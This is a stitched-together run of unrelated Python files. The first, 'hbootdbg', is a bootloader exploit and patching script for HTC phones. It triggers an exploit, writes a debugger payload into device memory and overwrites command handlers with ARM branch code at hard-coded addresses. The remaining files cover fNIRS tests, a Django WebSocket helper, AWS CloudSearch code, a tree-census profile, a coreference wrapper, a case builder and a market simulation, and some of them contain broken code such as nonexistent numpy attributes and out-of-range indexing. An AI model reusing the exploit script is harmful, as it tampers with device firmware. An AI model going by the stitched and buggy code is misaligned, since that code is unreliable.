#! /usr/bin/env python3 # This file is part of hbootdbg. # Copyright (c) 2013, Cedric Halbronn <[email protected]> # Copyright (c) 2013, Nicolas Hureau <[email protected]> # All right reserved. # # Redistribution and use in source and binary forms, with or without modification, # are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, this # list of conditions and the following disclaimer in the documentation and/or # other materials provided with the distribution. # # * Neither the name of the {organization} nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON # ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import argparse import binascii import os import struct import sys import time from hboot import HbootClient PRELOADER_PATH = '../src' DEBUGGER_PATH = '../src' TTY='/dev/ttyUSB0' ## # Preloader commands ## READ_MEM = 7 WRITE_MEM = 8 ## # Supported firmware revisions. ## # cmd_hook: address of function to hook # preload_addr: where the preloader is uploaded (device specific) DEVICE_OFFSETS = { 'vision_0.85.0005' : { 'fb_oem_hook' : 0x0, # FIXME 'hb_keytest_hook' : 0x0, # FIXME 'preloader' : 0x0, # FIXME 'payload' : 0x0, # FIXME }, 'vision_0.85.0015' : { 'fb_oem_hook' : 0x8D0020C8, 'hb_keytest_hook' : 0x8D010DF0, 'preloader' : 0x058D3000, 'payload' : 0x8D0E2000, # Where the debugger is uploaded }, 'saga_0.98.0002' : { 'fb_oem_hook' : 0x8D00236C, 'hb_keytest_hook' : 0x0, # FIXME 'preloader' : 0x069D3000, 'payload' : 0x0, # FIXME }, } def dbg_read_memory(fbc, addr, size): cmd = struct.pack('=BII', READ_MEM, addr, size) data = fbc.preloader(cmd) return data def dbg_write_memory(fbc, dest, data): (res1, res2) = fbc.download_data(data) cmd = struct.pack('=BII', WRITE_MEM, dest, len(data)) data = fbc.preloader(cmd) return data def step(msg, step_function, *args, out=sys.stderr, continue_on_fail=False): out.write('[*] %s' % msg) out.flush() (success, error_msg) = step_function(*args); if success: out.write('\r[+] %s: %s\n' % (msg, error_msg)) else: out.write('\r[!] %s: %s\n' % (msg, error_msg)) out.flush() if not success and not continue_on_fail: sys.exit(1) ## # Get HBOOT version ## def get_hboot_version(fbc): global offsets (res1, version0) = fbc.getvar('version-bootloader') (res2, product) = fbc.getvar('product') version='%s_%s' % (product.decode(), version0.decode()) if res1 != b'OKAY' or res2 != b'OKAY': return (False, 'Unknown device revision %s, aborting' % version) offsets = DEVICE_OFFSETS[version] return (True, version) ## # Copy preloader stub ## def copy_preloader(fbc): (res1,res2) = fbc.download('%s/preloader.bin' % PRELOADER_PATH) return (True, 'OK') ## # Trigger revolutionary exploit ## def trigger_exploit(fbc): (res, version_main) = fbc.getvar('version-main') return (True, 'OK') ## # Check if exploit successful ## def check_exploit_result(fbc): (res, version0) = fbc.getvar('version-bootloader') return (version0 == b'HACK', version0.decode()) ## # We can now use the preloader function to inject the real payload faster. ## def copy_hbootdbg(fbc): data = b'' with open('%s/hbootdbg.bin' % DEBUGGER_PATH, 'br') as f: data = dbg_write_memory(fbc, offsets['payload'], f.read()) return (True, 'OK') ## # Patch fastboot oem and hboot keytest to point at final payload ## # patch: # 10 40 2D E9 STMFD SP!, {R4,LR} # 0F E0 A0 E1 MOV LR, PC # 00 F0 1F E5 LDR PC, =0x8D0E2000 # 10 80 BD E8 LDMFD SP!, {R4,PC} # 00 00 0E 8D DCD 0x8D0E2000 def patch_cmds(fbc): global offsets patch = b'\x10\x40\x2D\xE9' patch += b'\x0F\xE0\xA0\xE1' patch += b'\x00\xF0\x1F\xE5' patch += b'\x10\x80\xBD\xE8' patch += struct.pack('I', offsets['payload']) data = dbg_write_memory(fbc, offsets['hb_keytest_hook'], patch) data = dbg_write_memory(fbc, offsets['fb_oem_hook'], patch) return (True, 'OK') if __name__ == '__main__': fbc = None parser = argparse.ArgumentParser() parser.add_argument('-d', '--debug', action='store_true') args = parser.parse_args() def connect_to_device(args): global fbc not_connected = True while not_connected: try: fbc = HbootClient(debug=args.debug) not_connected = False except Exception as e: time.sleep(1) return (True, 'OK') step('Wait for device', connect_to_device, args) step('Get HBOOT version', get_hboot_version, fbc) step('Copy preloader', copy_preloader, fbc) step('Trigger Revolutionary exploit', trigger_exploit, fbc) step('Get HBOOT version', check_exploit_result, fbc) step('Copy hbootdbg', copy_hbootdbg, fbc) step('Patch fastboot oem and hboot keytest commands', patch_cmds, fbc) fbc.close()
# Authors: Robert Luke <[email protected]> # Eric Larson <[email protected]> # Alexandre Gramfort <[email protected]> # # License: BSD (3-clause) import os.path as op import pytest import numpy as np from mne.datasets.testing import data_path from mne.io import read_raw_nirx, BaseRaw, read_raw_fif from mne.preprocessing.nirs import optical_density, beer_lambert_law from mne.utils import _validate_type from mne.datasets import testing from mne.externals.pymatreader import read_mat fname_nirx_15_0 = op.join(data_path(download=False), 'NIRx', 'nirscout', 'nirx_15_0_recording') fname_nirx_15_2 = op.join(data_path(download=False), 'NIRx', 'nirscout', 'nirx_15_2_recording') fname_nirx_15_2_short = op.join(data_path(download=False), 'NIRx', 'nirscout', 'nirx_15_2_recording_w_short') @testing.requires_testing_data @pytest.mark.parametrize('fname', ([fname_nirx_15_2_short, fname_nirx_15_2, fname_nirx_15_0])) @pytest.mark.parametrize('fmt', ('nirx', 'fif')) def test_beer_lambert(fname, fmt, tmpdir): """Test converting NIRX files.""" assert fmt in ('nirx', 'fif') raw = read_raw_nirx(fname) if fmt == 'fif': raw.save(tmpdir.join('test_raw.fif')) raw = read_raw_fif(tmpdir.join('test_raw.fif')) assert 'fnirs_cw_amplitude' in raw assert 'fnirs_od' not in raw raw = optical_density(raw) _validate_type(raw, BaseRaw, 'raw') assert 'fnirs_cw_amplitude' not in raw assert 'fnirs_od' in raw assert 'hbo' not in raw raw = beer_lambert_law(raw) _validate_type(raw, BaseRaw, 'raw') assert 'fnirs_cw_amplitude' not in raw assert 'fnirs_od' not in raw assert 'hbo' in raw assert 'hbr' in raw @testing.requires_testing_data def test_beer_lambert_unordered_errors(): """NIRS data requires specific ordering and naming of channels.""" raw = read_raw_nirx(fname_nirx_15_0) raw_od = optical_density(raw) raw_od.pick([0, 1, 2]) with pytest.raises(ValueError, match='ordered'): beer_lambert_law(raw_od) # Test that an error is thrown if channel naming frequency doesn't match # what is stored in loc[9], which should hold the light frequency too. raw_od = optical_density(raw) raw_od.rename_channels({'S2_D2 760': 'S2_D2 770'}) with pytest.raises(ValueError, match='frequency do not match'): beer_lambert_law(raw_od) # Test that an error is thrown if inconsistent frequencies used in data raw_od.info['chs'][2]['loc'][9] = 770.0 with pytest.raises(ValueError, match='pairs with frequencies'): beer_lambert_law(raw_od) @testing.requires_testing_data def test_beer_lambert_v_matlab(): """Compare MNE results to MATLAB toolbox.""" raw = read_raw_nirx(fname_nirx_15_0) raw = optical_density(raw) raw = beer_lambert_law(raw, ppf=0.121) raw._data *= 1e6 # Scale to uM for comparison to MATLAB matlab_fname = op.join(data_path(download=False), 'NIRx', 'nirscout', 'validation', 'nirx_15_0_recording_bl.mat') matlab_data = read_mat(matlab_fname) for idx in range(raw.get_data().shape[0]): mean_error = np.mean(matlab_data['data'][:, idx] - raw._data[idx]) assert mean_error < 0.1 matlab_name = ("S" + str(int(matlab_data['sources'][idx])) + "_D" + str(int(matlab_data['detectors'][idx])) + " " + matlab_data['type'][idx]) assert raw.info['ch_names'][idx] == matlab_name
import json from django.test.client import RequestFactory from django.core.urlresolvers import resolve, Resolver404 __version__ = '0.1.1' # Version synonym VERSION = __version__ class WebSocketRequest(object): def __init__(self, message, factory_defaults=None): self.message = message self.factory_defaults = factory_defaults self.error = None self.validate() def get_url(self): return self.json_message.get('url') def get_method(self): return self.json_message.get('method', 'GET').lower() def get_data(self): return self.json_message.get('data', {}) def get_token(self): return self.json_message.get('token') def set_error(self, error_message, status_code=400): self.error = { 'error': error_message, 'status_code': status_code } def validate(self): if self.is_valid_message(): self.url = self.get_url() self.method = self.get_method() self.data = self.get_data() self.token = self.get_token() if self.url: self.get_url_resolver_match() else: self.set_error('Missing URL') def is_valid(self): return not self.error def is_valid_message(self): try: self.json_message = json.loads(self.message) except ValueError: self.set_error('Invalid formatted message.') return False return True def get_url_resolver_match(self): try: return resolve(self.url) except Resolver404: self.set_error('Resource not found.', 404) def get_factory(self): defaults = {} if self.token: defaults['HTTP_AUTHORIZATION'] = "JWT {0}".format(self.token) if self.factory_defaults: defaults.update(self.factory_defaults) return RequestFactory(**defaults) def get_request(self, factory): if self.method != 'get': self.data = json.dumps(self.data) return getattr(factory, self.method)( self.url, self.data, content_type='application/json' ) def get_view(self, resolver_match, request): args = resolver_match.args kwargs = resolver_match.kwargs return resolver_match.func(request, *args, **kwargs) def get_response(self): if self.is_valid(): factory = self.get_factory() request = self.get_request(factory) resolver_match = self.get_url_resolver_match() view = self.get_view(resolver_match, request) return view return self.error
# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/ # Copyright (c) 2012 Amazon.com, Inc. or its affiliates. # All Rights Reserved # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # import boto.exception from boto.compat import json import requests import boto class SearchServiceException(Exception): pass class CommitMismatchError(Exception): pass class EncodingError(Exception): """ Content sent for Cloud Search indexing was incorrectly encoded. This usually happens when a document is marked as unicode but non-unicode characters are present. """ pass class ContentTooLongError(Exception): """ Content sent for Cloud Search indexing was too long This will usually happen when documents queued for indexing add up to more than the limit allowed per upload batch (5MB) """ pass class DocumentServiceConnection(object): """ A CloudSearch document service. The DocumentServiceConection is used to add, remove and update documents in CloudSearch. Commands are uploaded to CloudSearch in SDF (Search Document Format). To generate an appropriate SDF, use :func:`add` to add or update documents, as well as :func:`delete` to remove documents. Once the set of documents is ready to be index, use :func:`commit` to send the commands to CloudSearch. If there are a lot of documents to index, it may be preferable to split the generation of SDF data and the actual uploading into CloudSearch. Retrieve the current SDF with :func:`get_sdf`. If this file is the uploaded into S3, it can be retrieved back afterwards for upload into CloudSearch using :func:`add_sdf_from_s3`. The SDF is not cleared after a :func:`commit`. If you wish to continue using the DocumentServiceConnection for another batch upload of commands, you will need to :func:`clear_sdf` first to stop the previous batch of commands from being uploaded again. """ def __init__(self, domain=None, endpoint=None): self.domain = domain self.endpoint = endpoint if not self.endpoint: self.endpoint = domain.doc_service_endpoint self.documents_batch = [] self._sdf = None def add(self, _id, version, fields, lang='en'): """ Add a document to be processed by the DocumentService The document will not actually be added until :func:`commit` is called :type _id: string :param _id: A unique ID used to refer to this document. :type version: int :param version: Version of the document being indexed. If a file is being reindexed, the version should be higher than the existing one in CloudSearch. :type fields: dict :param fields: A dictionary of key-value pairs to be uploaded . :type lang: string :param lang: The language code the data is in. Only 'en' is currently supported """ d = {'type': 'add', 'id': _id, 'version': version, 'lang': lang, 'fields': fields} self.documents_batch.append(d) def delete(self, _id, version): """ Schedule a document to be removed from the CloudSearch service The document will not actually be scheduled for removal until :func:`commit` is called :type _id: string :param _id: The unique ID of this document. :type version: int :param version: Version of the document to remove. The delete will only occur if this version number is higher than the version currently in the index. """ d = {'type': 'delete', 'id': _id, 'version': version} self.documents_batch.append(d) def get_sdf(self): """ Generate the working set of documents in Search Data Format (SDF) :rtype: string :returns: JSON-formatted string of the documents in SDF """ return self._sdf if self._sdf else json.dumps(self.documents_batch) def clear_sdf(self): """ Clear the working documents from this DocumentServiceConnection This should be used after :func:`commit` if the connection will be reused for another set of documents. """ self._sdf = None self.documents_batch = [] def add_sdf_from_s3(self, key_obj): """ Load an SDF from S3 Using this method will result in documents added through :func:`add` and :func:`delete` being ignored. :type key_obj: :class:`boto.s3.key.Key` :param key_obj: An S3 key which contains an SDF """ #@todo:: (lucas) would be nice if this could just take an s3://uri..." self._sdf = key_obj.get_contents_as_string() def commit(self): """ Actually send an SDF to CloudSearch for processing If an SDF file has been explicitly loaded it will be used. Otherwise, documents added through :func:`add` and :func:`delete` will be used. :rtype: :class:`CommitResponse` :returns: A summary of documents added and deleted """ sdf = self.get_sdf() if ': null' in sdf: boto.log.error('null value in sdf detected. This will probably raise ' '500 error.') index = sdf.index(': null') boto.log.error(sdf[index - 100:index + 100]) url = "http://%s/2011-02-01/documents/batch" % (self.endpoint) # Keep-alive is automatic in a post-1.0 requests world. session = requests.Session() adapter = requests.adapters.HTTPAdapter( pool_connections=20, pool_maxsize=50, max_retries=5 ) session.mount('http://', adapter) session.mount('https://', adapter) r = session.post(url, data=sdf, headers={'Content-Type': 'application/json'}) return CommitResponse(r, self, sdf) class CommitResponse(object): """Wrapper for response to Cloudsearch document batch commit. :type response: :class:`requests.models.Response` :param response: Response from Cloudsearch /documents/batch API :type doc_service: :class:`boto.cloudsearch.document.DocumentServiceConnection` :param doc_service: Object containing the documents posted and methods to retry :raises: :class:`boto.exception.BotoServerError` :raises: :class:`boto.cloudsearch.document.SearchServiceException` :raises: :class:`boto.cloudsearch.document.EncodingError` :raises: :class:`boto.cloudsearch.document.ContentTooLongError` """ def __init__(self, response, doc_service, sdf): self.response = response self.doc_service = doc_service self.sdf = sdf try: self.content = json.loads(response.content) except: boto.log.error('Error indexing documents.\nResponse Content:\n{0}\n\n' 'SDF:\n{1}'.format(response.content, self.sdf)) raise boto.exception.BotoServerError(self.response.status_code, '', body=response.content) self.status = self.content['status'] if self.status == 'error': self.errors = [e.get('message') for e in self.content.get('errors', [])] for e in self.errors: if "Illegal Unicode character" in e: raise EncodingError("Illegal Unicode character in document") elif e == "The Content-Length is too long": raise ContentTooLongError("Content was too long") else: self.errors = [] self.adds = self.content['adds'] self.deletes = self.content['deletes'] self._check_num_ops('add', self.adds) self._check_num_ops('delete', self.deletes) def _check_num_ops(self, type_, response_num): """Raise exception if number of ops in response doesn't match commit :type type_: str :param type_: Type of commit operation: 'add' or 'delete' :type response_num: int :param response_num: Number of adds or deletes in the response. :raises: :class:`boto.cloudsearch.document.CommitMismatchError` """ commit_num = len([d for d in self.doc_service.documents_batch if d['type'] == type_]) if response_num != commit_num: raise CommitMismatchError( 'Incorrect number of {0}s returned. Commit: {1} Response: {2}'\ .format(type_, commit_num, response_num))
# -*- coding: utf-8 -*- from __future__ import print_function from __future__ import unicode_literals from __future__ import division from django.core.urlresolvers import reverse from libs.sql import get_user_tree_count, get_user_surveyed_species from apps.users.forms import PrivacySettingsForm from apps.users.models import achievements, update_achievements _FOLLOWED_GROUP_CHUNK_SIZE = 2 _RESERVATION_CHUNK_SIZE = 2 def user_profile_context(user, its_me=True, home_page=True): block_count = user.blocks_mapped_count tree_count = get_user_tree_count(user) species_surveyed = get_user_surveyed_species(user) # Distinct count, not total species_count = len(species_surveyed) event_count = user.eventregistration_set \ .filter(did_attend=True) \ .count() # In order to show the tree count in a "ticker" we need to break it up # into digits and pad it with zeroes. tree_digits = [digit for digit in "{:07d}".format(tree_count)] privacy_form = PrivacySettingsForm(instance=user) contributions_title = 'Your Contributions' if its_me else 'Contributions' earned_achievements = get_achievements_for_user(user)['achieved'] context = { 'user': user, 'viewing_own_profile': its_me, 'show_username': can_show_full_name(user, its_me), 'show_achievements': its_me or (len(earned_achievements) > 0 and user.achievements_are_public), 'show_contributions': (not home_page and (its_me or user.contributions_are_public)), 'contributions_title': contributions_title, 'show_groups': its_me or user.group_follows_are_public, 'show_individual_mapper': (user.individual_mapper and (its_me or user.profile_is_public)), 'show_reservations': (user.individual_mapper and its_me), 'show_request_access': (its_me and user.eligible_to_become_individual_mapper()), 'follows': _get_follows_context(user), 'reservations': _get_reservations_context(user), 'privacy_categories': get_privacy_categories(privacy_form), 'counts': { 'block': block_count, 'tree': tree_count, 'tree_digits': tree_digits, 'species': species_count, 'species_by_name': species_surveyed, 'event': event_count }, 'achievements': earned_achievements } return context def can_show_full_name(user, its_me=False): return ((its_me or user.real_name_is_public) and (user.first_name or user.last_name)) def get_privacy_categories(form): user = form.instance def make_category(title, field_name): return { 'title': title, 'field_name': field_name, 'is_public': getattr(user, field_name), 'form_field': form[field_name] } return [ make_category('Profile', 'profile_is_public'), make_category('Name', 'real_name_is_public'), make_category('Groups', 'group_follows_are_public'), make_category('Contributions', 'contributions_are_public'), make_category('Rewards', 'achievements_are_public'), ] def get_achievements_for_user(user): if user.is_authenticated(): update_achievements(user) user_achievements = set(user.achievement_set .order_by('created_at') .values_list('achievement_id', flat=True)) else: user_achievements = set() return { 'achieved': [(key, achievements[key]) for key in achievements.iterkeys() if key in user_achievements], 'remaining': [ (key, achievements[key]) for key in achievements.iterkeys() if key not in user_achievements and achievements[key].active], 'all': achievements } def _get_list_section_context(key, qs, chunk_size): count = qs.count() hidden_count = count - chunk_size return { 'count': count, 'chunk_size': chunk_size, 'hidden_count': hidden_count, key: qs } def _get_follows_context(user): follows = user.follow_set.select_related('group').order_by('created_at') return _get_list_section_context('follows', follows, _FOLLOWED_GROUP_CHUNK_SIZE) def _get_reservations_context(user): reservations = user.blockfacereservation_set\ .current()\ .select_related('blockface')\ .order_by('expires_at') context = _get_list_section_context('reservations', reservations, _RESERVATION_CHUNK_SIZE) context['map_poll_url'] = reverse('reservations_map_pdf_poll') return context
__author__ = 'bernhard' import os import shutil import subprocess from qa_jbt.utils.paths import create_paths from jbt_berkeley_coref_resolution.CorefOutputParser import CorefOutputParser def do_coreference(article_content, data_path=os.path.join('.', 'data'), max_memory=6): temp_path = os.path.join(os.path.normpath(data_path), 'coref_temp') jar_home = os.path.normpath(os.path.join(data_path, '..', '..', 'jbt_berkeley_coref_resolution')) paths = { 'input': os.path.join(temp_path, 'input'), 'preprocess': os.path.join(temp_path, 'output_preprocessing'), 'output': os.path.join(temp_path, 'output_coref'), 'exec_p': os.path.join(temp_path, 'exec_p'), 'exec_c': os.path.join(temp_path, 'exec_c') } create_paths(data_path, temp_path, [paths['input'], paths['preprocess'], paths['output']]) # write to file with open(os.path.join(paths['input'], 'article'), mode='w', encoding='utf-8') as o: o.writelines(article_content) # call preprocessor try: output = subprocess.check_output( "java -cp berkeleycoref-1.1.jar " "-Xmx{}g " "edu.berkeley.nlp.coref.preprocess.PreprocessingDriver " "++base.conf " "-execDir {} " "-inputDir {} " "-outputDir {} " "-skipSentenceSplitting true " "-respectInputLineBreaks true".format( max_memory, # max Heap size in GB paths['exec_p'], paths['input'], paths['preprocess'] ), cwd=jar_home, shell=True ) print(output) except subprocess.CalledProcessError as e: print(e) return None # rename file for later use os.rename( os.path.join(paths['preprocess'], 'article'), os.path.join(paths['preprocess'], 'article.auto_conll') ) # extracting coreferences try: output = subprocess.check_output( "java -jar -Xmx{}g berkeleycoref-1.1.jar " "++base.conf " "-execDir {} " "-modelPath {} " "-testPath {} " "-outputPath {} " "-mode PREDICT".format( max_memory, # max memory for process paths['exec_c'], # execDir for coreference os.path.join('models', 'coref-rawtext-final.ser'), # model path paths['preprocess'], # input path os.path.join(paths['preprocess'], 'berkeley_output_temp') # output file ), cwd=jar_home, shell=True ) print(output) except subprocess.CalledProcessError as e: print(e) return None # preparing output with open(os.path.join(paths['preprocess'], 'berkeley_output_temp'), mode='r', encoding='utf-8') as input_file: lines = input_file.readlines() with open(os.path.join(paths['output'], 'article-coref-raw'), mode='w', encoding='utf-8') as output_file: output_file.writelines(lines[1:-1]) # get parsed output file lines = CorefOutputParser(os.path.join(paths['output'], 'article-coref-raw')).get_resolved_text() # remove temp path after running shutil.rmtree(temp_path) return lines
#!/usr/local/bin/python3 # -*- coding:utf-8 -*- import __future__ import os import sys from importlib import * from shutil import rmtree import script.rio as io def build_case(case_path, output_dir, force_build = False): ''' Build all physical/numerical data from case ''' # If the directory does not exist, then build: if not os.path.isdir(output_dir): force_build = True io.make_sure_path_exists(output_dir) if not force_build: last_modif = os.path.getmtime(os.path.join(case_path, 'chars.py')) case_build_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'initial_condition') for f in os.listdir(case_build_dir): if f.endswith(".py"): last_modif = max(last_modif, os.path.getmtime(os.path.join(case_build_dir, f))) if last_modif < os.path.getctime(output_dir): print('case already built') sys.path.append(case_path) import chars qtyList = chars.quantityList del sys.path[-1] del sys.modules["chars"] del chars return list(qtyList) print("Case path:", case_path) sys.path.append(case_path) # Reload chars also else, you build the case with the wrong characteristics import chars as case reload(case) coords_to_uid = io.gen_coords_to_uid(case.Nx, case.Ny) coords_to_bc = dict() quantityDict = dict() case.buildme(quantityDict, coords_to_uid, coords_to_bc) # Merging uid and bc dictionaries coords_to_uid_bc = io.gen_coords_to_uid_bc(case.Nx, case.Ny, case.BClayer) ds = [coords_to_uid_bc, coords_to_bc] coords_to_uid_and_bc = dict() for coord in coords_to_bc: coords_to_uid_and_bc[coord] = tuple(d.get(coord) for d in ds) rmtree(output_dir, ignore_errors=True) io.make_sure_path_exists(output_dir) # Write scheme info io.write_scheme_info(output_dir, case.T, case.CFL, case.gamma) # Write domain io.write_domain(output_dir, case.lx, case.ly, case.Nx, case.Ny, coords_to_uid, case.BClayer) # Write boundary conditions io.write_bc(output_dir, coords_to_uid_and_bc) # Write quantities and boundary conditions if necessary for q_name, q in quantityDict.items(): io.write_quantity(output_dir, q_name, q) # Use quantity list from the characteristics. q_name_list = list(case.quantityList) # Del case and chars del sys.path[-1] del sys.modules["chars"] del case # Return path to case directory return q_name_list if __name__ == "__main__": # Argument parser parser = argparse.ArgumentParser(description="Build case tool") parser.add_argument("-d", type = str, help = "Root directory") parser.add_argument("-p", type = str, help = "Project name") parser.add_argument("-c", type = str, help = "Case name") args = parser.parse_args() build_case(args.d, args.p, args.c)
import numpy as np from enum import Enum import heapq class CustomerTypes(Enum): Innovator = 99 Early_Adopter = 96.5 Early_Majority = 83 Late_Majority = 49 Laggard = 15 class Product(object): def __init__(self): self.version = 0 self.price = np.infinite self.innovation_points = 0. self.quality = 0. def change_params(self, params, bump_version=True): if bump_version: self.version += 1 self.price = params.get('price', np.infinite) self.innovation_points = params.get('innovation', 0.) self.quality = params.get('quality', 0.) class Company(object): def __init__(self, name, market__share): self.name = name self.market_share = market__share self.product = None self.type = None self.competitive_advantage = 0. self.industry_attractiveness = 0. self.environmental_stability = 0. self.financial_strength = 0. self.history = [] self.customer_loyalty = 3 self.space_params = { 'competitive_advantage': { 'market_share': 3, 'product_quality': 3, 'product_life_cycle': 3, # late to early 'product_replacement_cycle': 3, # variable to fixed 'customer_loyalty': self.customer_loyalty, 'know_how': 3, 'vertical_integration': 3, }, 'industry_attractiveness': { 'growth_potential': 3, 'profit_potential': 3, 'financial_stability': 3, 'know_how': 3, 'resource_utilization': 3, 'capital_intensity': 3, 'ease_of_entry': 3, 'capacity_utilization': 3, }, 'environmental_stability': { 'technological_changes': 3, 'rate_of_inflation': 3, 'demand_variability': 3, 'barriers_to_entry': 3, 'competitive_pressure': 3, 'price_elasticity_of_demand': 3, 'pressure_from_substitutes': 3 }, 'financial_strength': { 'ROI': 3, 'leverage': 3, 'liquidity': 3, 'required_to_available_capital': 3, 'cash_flow': 3, 'ease_of_exit': 3, 'risk_doing_business': 3, # much to little 'inventory_turnover': 3, } } def set_space_params(self, args=None): # if args exist then add copy them to space params if args: for k in args: if self.space_params.get(k, None): for k2 in args[k]: if self.space_params[k].get(k2, None): self.space_params[k][k2] = args[k][k2] # calculate the SPACE parameters for key in self.space_params: category_sum = 0 for i, category in enumerate(self.space_params[key]): category_sum += self.space_params[key][category] setattr(self, key, float(category_sum) / float(i + 1)) def set_space_values(self, ca, ia, es, fs): self.competitive_advantage = ca self.industry_attractiveness = ia self.environmental_stability = es self.financial_strength = fs self._define_quadrant() def _define_quadrant(self): # TODO do this attrs = [self.competitive_advantage, self.industry_attractiveness, self.environmental_stability, self.financial_strength] maxes = heapq.nlargest(2, attrs) ind1 = attrs.index(maxes[0]) ind2 = attrs.index(maxes[2]) def make_product(self, params): self.product = Product() self.product.change_params(params) def make_move(self): pass class Customer(object): def __init__(self): self.type = None self.sensitivity = { 'price': None, 'quality': None, 'features': None } self.product = None self._define_type() def decide_to_buy(self, companies): # TODO make parameters to buy scores = [] for company in companies: temp_product = company.product score = 0. # decided by loyalty, price , quality etc scores.append(score) product = companies[scores.index(max(scores))].product def _define_type(self): """ Use diffusion of innovations model to decide the customer type """ sigma = 1 mean = 0 r = np.random.normal(mean, sigma) if mean <= r < sigma: self.type = CustomerTypes.Late_Majority if r >= sigma: self.type = CustomerTypes.Laggard if -sigma <= r < mean: self.type = CustomerTypes.Early_Majority if -2 * sigma <= r < -sigma: self.type = CustomerTypes.Early_Adopter if r <= - 2 * sigma: self.type = CustomerTypes.Innovator class Market(object): def __init__(self, args): self.growth_rate = args.get('growth_rate', 0.) self.value = args.get('market_value', 0.) self.customers = [] def add_customers(self, n_customers=100000): """ Adds customers to the market :param n_customers: How many to add to the market """ for i in xrange(n_customers): cust = Customer() self.customers.append(cust) def grow(self): """ Grows the market by adding more customers. """ self.add_customers(int(len(self.customers) * self.growth_rate)) # class Strategy(object): # # def __init__(self, product, params): # pass class TheGame(object): def __init__(self, market, companies): self.market = market self.companies = companies[1:] self.ours = companies[0] def play(self): pass